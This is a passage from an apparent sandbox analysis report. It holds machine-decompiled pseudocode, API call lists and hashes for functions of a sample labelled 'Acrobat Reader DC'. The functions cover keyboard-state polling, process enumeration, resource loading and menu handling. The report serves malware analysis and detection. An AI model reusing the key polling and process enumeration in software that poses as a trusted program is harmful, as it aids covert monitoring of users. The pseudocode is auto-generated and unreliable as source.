                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t58;
                                  				intOrPtr _t61;
                                  				char* _t62;
                                  				signed int _t94;
                                  				void* _t102;
                                  				void* _t103;
                                  				intOrPtr _t104;
                                  				signed int _t108;
                                  				signed int _t111;
                                  				void* _t112;
                                  				void* _t123;
                                  
                                  				_t123 = __fp0;
                                  				_t58 = E004323E1( &_a4, 0);
                                  				_t102 = _t58;
                                  				__imp__#41(0xc, _t102,  &_v8);
                                  				if(_t58 < 0) {
                                  					L13:
                                  					E00408F40(_t102,  &_a4);
                                  					return 0;
                                  				} else {
                                  					_t94 = 0;
                                  					if(_t102 > 0) {
                                  						do {
                                  							_t4 = _t94 + 1; // 0x1
                                  							_t111 = _t4;
                                  							 *((intOrPtr*)(_v8 + 0x14 + _t94 * 8)) = 0;
                                  							 *((intOrPtr*)(_v8 + 0x10 + _t94 * 8)) = E004323E1( &_a4, _t111);
                                  							_t94 = _t111;
                                  						} while (_t94 < _t102);
                                  					}
                                  					_t61 = _v8;
                                  					 *((short*)(_t61 + 2)) = 0x880;
                                  					 *((intOrPtr*)(_v8 + 4)) = 0x10;
                                  					__imp__#37(_v8);
                                  					if(_t61 < 0) {
                                  						__imp__#38(_v8);
                                  						goto L13;
                                  					} else {
                                  						_t62 =  &_v36;
                                  						__imp__#8(_t62);
                                  						_v28 = 0;
                                  						_v24 = 0;
                                  						_v52 = 0;
                                  						_v44 = 1;
                                  						_v40 = 0;
                                  						__imp__#23(_v8,  &_v16);
                                  						if(_t62 < 0) {
                                  							__imp__#39(_v8);
                                  							__imp__#38(_v8);
                                  							E00408F40(_t102,  &_v52);
                                  							__imp__#9( &_v36);
                                  							E00408F40(_t102,  &_a4);
                                  							return 0;
                                  						} else {
                                  							_v12 = _v16;
                                  							E00408E80( &_v52,  &_a4,  &_a4);
                                  							_t103 = E00479230( &_a4,  &_v52,  &_v20);
                                  							_t108 = 0;
                                  							if(_t103 > 0) {
                                  								_t91 = _v12;
                                  								do {
                                  									_t75 = _v20;
                                  									if( *((intOrPtr*)(_v20 + _t108 * 4)) != 0) {
                                  										_t112 = _t112 - 0x10;
                                  										E0040B960( *((intOrPtr*)(_t75 + _t108 * 4)), _t112, _t91, _t103);
                                  										E00470E55(_t91, _t103, _t123);
                                  										_t91 = _v12;
                                  										__imp__#10(_v12,  &_v36,  &_v36);
                                  									}
                                  									_v12 = _v12 + 0x10;
                                  									_t108 = _t108 + 1;
                                  								} while (_t108 < _t103);
                                  							}
                                  							__imp__#24(_v8);
                                  							_t104 = _v8;
                                  							E00408F40(_t104,  &_v52);
                                  							__imp__#9( &_v36);
                                  							_v28 = 0;
                                  							_v24 = 0;
                                  							E00408F40(_t104,  &_a4);
                                  							return _t104;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                  • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004447E0(intOrPtr _a4, char* _a8) {
                                  				intOrPtr _v99;
                                  				intOrPtr _v100;
                                  				intOrPtr _v169;
                                  				intOrPtr _v242;
                                  				intOrPtr _v243;
                                  				intOrPtr _v244;
                                  				char _v260;
                                  				char* _t55;
                                  				intOrPtr _t78;
                                  				char* _t79;
                                  
                                  				_t79 = _a8;
                                  				_t78 = _a4;
                                  				 *_t79 = 0;
                                  				 *((short*)(_t79 + 4)) = 0;
                                  				if( *((intOrPtr*)(_t78 + 0x20)) == 0) {
                                  					if((0x00008000 & GetAsyncKeyState(0xa0)) != 0 || (0x00008000 & GetKeyState(0xa0)) != 0) {
                                  						if( *((char*)(_t78 + 0x1a)) == 0) {
                                  							 *_t79 = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0xa1)) != 0 || (0x00008000 & GetKeyState(0xa1)) != 0) {
                                  						if( *((char*)(_t78 + 0x1b)) == 0) {
                                  							 *((char*)(_t79 + 1)) = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0x11)) != 0 || (0x00008000 & GetKeyState(0x11)) != 0) {
                                  						if( *((char*)(_t78 + 0x1c)) == 0) {
                                  							 *((char*)(_t79 + 2)) = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0x12)) != 0 || (0x00008000 & GetKeyState(0x12)) != 0) {
                                  						if( *((char*)(_t78 + 0x1d)) == 0) {
                                  							 *((char*)(_t79 + 3)) = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0x5b)) != 0 || (0x00008000 & GetKeyState(0x5b)) != 0) {
                                  						_t55 = _t79;
                                  						if( *((char*)(_t78 + 0x1e)) == 0) {
                                  							 *((char*)(_t79 + 4)) = 1;
                                  							return _t55;
                                  						}
                                  						goto L39;
                                  					} else {
                                  						goto L18;
                                  					}
                                  				} else {
                                  					if(GetKeyboardState( &_v260) == 0) {
                                  						L18:
                                  						return _t79;
                                  					} else {
                                  						if(_v100 == 0x80 || _v244 == 0x80) {
                                  							if( *((char*)(_t78 + 0x1a)) == 0) {
                                  								 *_t79 = 1;
                                  							}
                                  						}
                                  						if(_v99 == 0x80 &&  *((char*)(_t78 + 0x1b)) == 0) {
                                  							 *((char*)(_t79 + 1)) = 1;
                                  						}
                                  						if(_v243 == 0x80 &&  *((char*)(_t78 + 0x1c)) == 0) {
                                  							 *((char*)(_t79 + 2)) = 1;
                                  						}
                                  						if(_v242 == 0x80 &&  *((char*)(_t78 + 0x1d)) == 0) {
                                  							 *((char*)(_t79 + 3)) = 1;
                                  						}
                                  						if(_v169 != 0x80) {
                                  							goto L18;
                                  						} else {
                                  							_t55 = _t79;
                                  							if( *((char*)(_t78 + 0x1e)) != 0) {
                                  								L39:
                                  								return _t55;
                                  							} else {
                                  								 *((char*)(_t79 + 4)) = 1;
                                  								return _t55;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                  • GetKeyState.USER32(00000011), ref: 00444903
                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E0043305F(void* __edx, void* __edi, struct HINSTANCE__* _a4, int _a12, void* _a16) {
                                  				char _v16;
                                  				char _v28;
                                  				struct HRSRC__* _t27;
                                  				void* _t28;
                                  				void* _t29;
                                  				void* _t34;
                                  				BYTE* _t36;
                                  				int _t38;
                                  				signed char* _t43;
                                  				int _t49;
                                  				struct HRSRC__* _t61;
                                  				long _t63;
                                  				WCHAR* _t65;
                                  				struct HINSTANCE__* _t66;
                                  
                                  				_t65 = _a12;
                                  				E0041329B(__edx,  &_v16, L"%d", _t65);
                                  				E0041329B( &_v28,  &_v28, L"%d", _a16);
                                  				if(E004114AB(__edi,  &_v28,  &_v16) != 0) {
                                  					L2:
                                  					return 1;
                                  				} else {
                                  					_t66 = _a4;
                                  					_t27 = FindResourceW(_t66, _t65, 0xe);
                                  					if(_t27 != 0) {
                                  						_t28 = LoadResource(_t66, _t27);
                                  						if(_t28 == 0) {
                                  							goto L2;
                                  						} else {
                                  							_push(__edi);
                                  							_t29 = LockResource(_t28);
                                  							_a4 = _t29;
                                  							_a12 = 0;
                                  							if(0 >=  *((intOrPtr*)(_t29 + 4))) {
                                  								L15:
                                  								return 0;
                                  							} else {
                                  								_t11 = _t29 + 6; // 0x6
                                  								_t43 = _t11;
                                  								while(1) {
                                  									_t61 = FindResourceW(_t66, _t43[0xc] & 0x0000ffff, 3);
                                  									if(_t61 == 0) {
                                  										break;
                                  									}
                                  									_t34 = LoadResource(_t66, _t61);
                                  									_a16 = _t34;
                                  									if(_t34 == 0) {
                                  										break;
                                  									} else {
                                  										_t63 = SizeofResource(_t66, _t61);
                                  										_t36 = LockResource(_a16);
                                  										_t49 =  *0x497530;
                                  										if(( *_t43 & 0x000000ff) != _t49 || (_t43[1] & 0x000000ff) !=  *0x49752c || (_t43[6] & 0x0000ffff) !=  *0x497528) {
                                  											_t38 = _a12 + 1;
                                  											_t43 =  &(_t43[0xe]);
                                  											_a12 = _t38;
                                  											if(_t38 < ( *(_a4 + 4) & 0x0000ffff)) {
                                  												continue;
                                  											} else {
                                  												return 0;
                                  											}
                                  										} else {
                                  											 *0x497534 = CreateIconFromResourceEx(_t36, _t63, 1, 0x30000, _t49,  *0x49752c, 0);
                                  											goto L15;
                                  										}
                                  									}
                                  									goto L16;
                                  								}
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  				L16:
                                  			}

                                  APIs
                                  • __swprintf.LIBCMT ref: 00433073
                                  • __swprintf.LIBCMT ref: 00433085
                                  • __wcsicoll.LIBCMT ref: 00433092
                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                  • LockResource.KERNEL32(?), ref: 00433120
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                  • String ID:
                                  • API String ID: 1158019794-0
                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004485CB(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, int _a24) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				signed int _t46;
                                  				struct HMENU__* _t58;
                                  				struct HMENU__* _t59;
                                  				signed int _t61;
                                  				intOrPtr _t63;
                                  				intOrPtr _t65;
                                  				intOrPtr _t72;
                                  				struct HWND__** _t79;
                                  				int _t80;
                                  				struct HWND__* _t81;
                                  
                                  				_t61 = _a8;
                                  				_t80 = _a16;
                                  				_t79 = _a4;
                                  				_v52.cbSize = 0x30;
                                  				E00412F40( &(_v52.fMask), 0, 0x2c);
                                  				if(_t80 != 0xffffffff) {
                                  					if(E00441AF5(0x4a8630, _t80,  &_a16,  &_a8) != 0) {
                                  						_t72 =  *0x4a8690; // 0x0
                                  						_t79 =  *( *(_t72 + _a16 * 4));
                                  						_t46 = _a8;
                                  						_t63 =  *0x4a86a4; // 0xa71980
                                  						 *(_t61 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t63 + _t46 * 4)))) + 8);
                                  						_t65 =  *0x4a86a4; // 0xa71980
                                  						if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t65 + _t46 * 4)))) + 0x88)) == 0xc) {
                                  							L9:
                                  							if(IsMenu( *(_t61 + 8)) == 0) {
                                  								goto L5;
                                  							} else {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							_v52.fMask = 4;
                                  							if(GetMenuItemInfoW( *(_t61 + 8), _t80, 0,  &_v52) == 0) {
                                  								goto L5;
                                  							} else {
                                  								 *(_t61 + 8) = _v52.hSubMenu;
                                  								goto L9;
                                  							}
                                  						}
                                  					} else {
                                  						goto L5;
                                  					}
                                  				} else {
                                  					_t58 = _t79[0x68];
                                  					if(_t58 == 0) {
                                  						_t59 = CreateMenu();
                                  						_t79[0x68] = _t59;
                                  						SetMenu( *_t79, _t59);
                                  						_t58 = _t79[0x68];
                                  						_t79[0x6a] = _t58;
                                  					}
                                  					 *(_t61 + 8) = _t58;
                                  					L10:
                                  					_t81 = CreatePopupMenu();
                                  					if(_t81 == 0) {
                                  						L5:
                                  						return 0;
                                  					} else {
                                  						_v52.dwTypeData = _a20;
                                  						_v52.wID = _a12;
                                  						_v52.fMask = 0x16;
                                  						_v52.fType = 0;
                                  						_v52.hSubMenu = _t81;
                                  						InsertMenuItemW( *(_t61 + 8), _a24, 1,  &_v52);
                                  						DrawMenuBar( *_t79);
                                  						_t79[0x6a] = _t81;
                                  						return 1;
                                  					}
                                  				}
                                  			}















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                  • String ID: 0
                                  • API String ID: 176399719-4108050209
                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00433D9E(intOrPtr _a4, long* _a8, void* _a12) {
                                  				unsigned int _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v24;
                                  				char _v540;
                                  				char _v1064;
                                  				char _v1580;
                                  				char _v2096;
                                  				char _v4144;
                                  				void* __edi;
                                  				unsigned int* _t36;
                                  				intOrPtr _t38;
                                  				intOrPtr _t42;
                                  				void* _t49;
                                  				long _t50;
                                  				signed int _t54;
                                  				intOrPtr _t62;
                                  				unsigned int _t74;
                                  				void* _t78;
                                  				void* _t79;
                                  				void* _t80;
                                  				void* _t81;
                                  
                                  				E00422240(0x102c);
                                  				_t36 =  &_v8;
                                  				__imp__EnumProcesses( &_v4144, 0x800, _t36);
                                  				if(_t36 != 0) {
                                  					_t4 =  &_a12; // 0x443d49
                                  					_t74 = _v8 >> 2;
                                  					 *((char*)( *_t4)) = 0;
                                  					_t38 = E00433D5F( &_v4144, _a4);
                                  					_t81 = _t80 + 4;
                                  					_t54 = 0;
                                  					_v16 = _t38;
                                  					if(_t74 != 0) {
                                  						while( *_a12 == 0) {
                                  							_t78 = OpenProcess(0x410, 0,  *(_t79 + _t54 * 4 - 0x102c));
                                  							__imp__EnumProcessModules(_t78,  &_v12, 4,  &_v8);
                                  							_t42 = _v12;
                                  							__imp__GetModuleBaseNameW(_t78, _t42,  &_v1064, 0x104);
                                  							if(_t42 != 0) {
                                  								E00413A0E( &_v1064,  &_v24,  &_v2096,  &_v540,  &_v1580);
                                  								E00411536( &_v540,  &_v1580);
                                  								_t49 = E004114AB(_t74,  &_v540, _a4);
                                  								_t81 = _t81 + 0x24;
                                  								if(_t49 != 0) {
                                  									_t62 = _v16;
                                  									if(_t62 != 0) {
                                  										_t50 =  *(_t79 + _t54 * 4 - 0x102c);
                                  										if(_t62 == _t50) {
                                  											 *_a8 = _t50;
                                  											goto L11;
                                  										}
                                  									}
                                  								} else {
                                  									 *_a8 =  *(_t79 + _t54 * 4 - 0x102c);
                                  									L11:
                                  									 *_a12 = 1;
                                  								}
                                  							}
                                  							CloseHandle(_t78);
                                  							_t54 = _t54 + 1;
                                  							if(_t54 < _t74) {
                                  								continue;
                                  							}
                                  							break;
                                  						}
                                  					}
                                  					return 1;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}


























                                  APIs
                                  • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                  • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                  • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                  • __wsplitpath.LIBCMT ref: 00433E6D
                                  • _wcscat.LIBCMT ref: 00433E80
                                  • __wcsicoll.LIBCMT ref: 00433E90
                                  • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                  • String ID: I=D
                                  • API String ID: 2903788889-2605949546
                                  • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
                                  • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00448D62(void* __eflags, signed int _a4, signed char _a7, long _a8) {
                                  				intOrPtr _v8;
                                  				signed int _v12;
                                  				long _t44;
                                  				signed int _t45;
                                  				signed char _t55;
                                  				intOrPtr _t61;
                                  				intOrPtr _t66;
                                  				struct HWND__* _t70;
                                  				struct HWND__** _t75;
                                  
                                  				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v12) == 0) {
                                  					L27:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t61 =  *0x4a8690; // 0x0
                                  					_t66 =  *0x4a86a4; // 0xa71980
                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + _a4 * 4))));
                                  					_t75 =  *( *(_t66 + _v12 * 4));
                                  					_t55 = _t75[0x22];
                                  					_t70 =  *_t75;
                                  					_a7 = _t55;
                                  					E00432B92( &_a8);
                                  					_t44 = _t75[0x11];
                                  					_t83 = _t44;
                                  					if(_t44 >= 0) {
                                  						E004413AA(_t83, _t44);
                                  					}
                                  					_t45 = _t55 & 0x000000ff;
                                  					if(_t45 > 0x1b) {
                                  						goto L27;
                                  					} else {
                                  						switch( *((intOrPtr*)(( *(_t45 + 0x448f86) & 0x000000ff) * 4 +  &M00448F62))) {
                                  							case 0:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eflags < 0) {
                                  									goto L27;
                                  								} else {
                                  									__esi[0x11] = __eax;
                                  									__eax = E00441432(__ecx, __eflags, __eax, 1);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 1:
                                  								L19:
                                  								__esi[0x11] = __ebx;
                                  								E00441432(__ecx, __eflags, __ebx, 1) = E00430B87(_v8, __esi, 1);
                                  								goto L23;
                                  							case 2:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eax < 0) {
                                  									goto L27;
                                  								} else {
                                  									__eax = SendMessageW(__edi, 0x2001, 0, __eax);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 3:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eax < 0) {
                                  									goto L27;
                                  								} else {
                                  									__eax = SendMessageW(__edi, 0x111d, 0, __eax);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 4:
                                  								__eax = _a8;
                                  								__eflags = __eax;
                                  								if(__eflags < 0) {
                                  									goto L27;
                                  								} else {
                                  									__esi[0x11] = __eax;
                                  									__eax = E00441432(__ecx, __eflags, __eax, 1);
                                  									__ecx = __esi[0xc];
                                  									__eax = InvalidateRect(__esi[0xc], 0, 1);
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 5:
                                  								__eax = _a8;
                                  								__eflags = __eax - 0xffffffff;
                                  								if(__eflags < 0) {
                                  									goto L27;
                                  								} else {
                                  									__esi[0x11] = __eax;
                                  									__eax = E00441432(__ecx, __eflags, __eax, 1);
                                  									__eflags = __esi[0x22] & 0x00000020;
                                  									if((__esi[0x22] & 0x00000020) == 0) {
                                  										__eax =  *__esi;
                                  										__edi = ShowWindow;
                                  										__eax = ShowWindow( *__esi, 0);
                                  										__ecx =  *__esi;
                                  										ShowWindow( *__esi, 5) = SetFocus( *__esi);
                                  									}
                                  									goto L23;
                                  								}
                                  								goto L28;
                                  							case 6:
                                  								_t57 = _a8;
                                  								if(_t57 == 0xfffffffe) {
                                  									goto L27;
                                  								} else {
                                  									_t86 = _t57 - 0xfe000000;
                                  									if(_t57 != 0xfe000000) {
                                  										SendMessageW(_t70, 0x1001, 0, _t57);
                                  										SendMessageW(_t70, 0x1026, 0, _t57);
                                  										_t49 = E00430B87(_v8, _t75, 1);
                                  									} else {
                                  										_t75[0x11] = _t57;
                                  										_t49 = E00441432(_t63, _t86, _t57, 1);
                                  									}
                                  									L23:
                                  									if( *0x49751c == 0 || _a7 != 8) {
                                  										return 1;
                                  									} else {
                                  										return _t49 | 0xffffffff;
                                  									}
                                  								}
                                  								goto L28;
                                  							case 7:
                                  								__eflags = __ebx;
                                  								if(__ebx < 0) {
                                  									goto L27;
                                  								} else {
                                  									__eax = GetWindowLongW(__edi, 0xfffffff0);
                                  									__eax = __eax | 0x0000000b;
                                  									__eflags = __eax;
                                  									__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
                                  									goto L19;
                                  								}
                                  								goto L28;
                                  							case 8:
                                  								goto L27;
                                  						}
                                  					}
                                  				}
                                  				L28:
                                  			}













                                  APIs
                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                  • SendMessageW.USER32(76F1D360,00001001,00000000,?), ref: 00448E16
                                  • SendMessageW.USER32(76F1D360,00001026,00000000,?), ref: 00448E25
                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
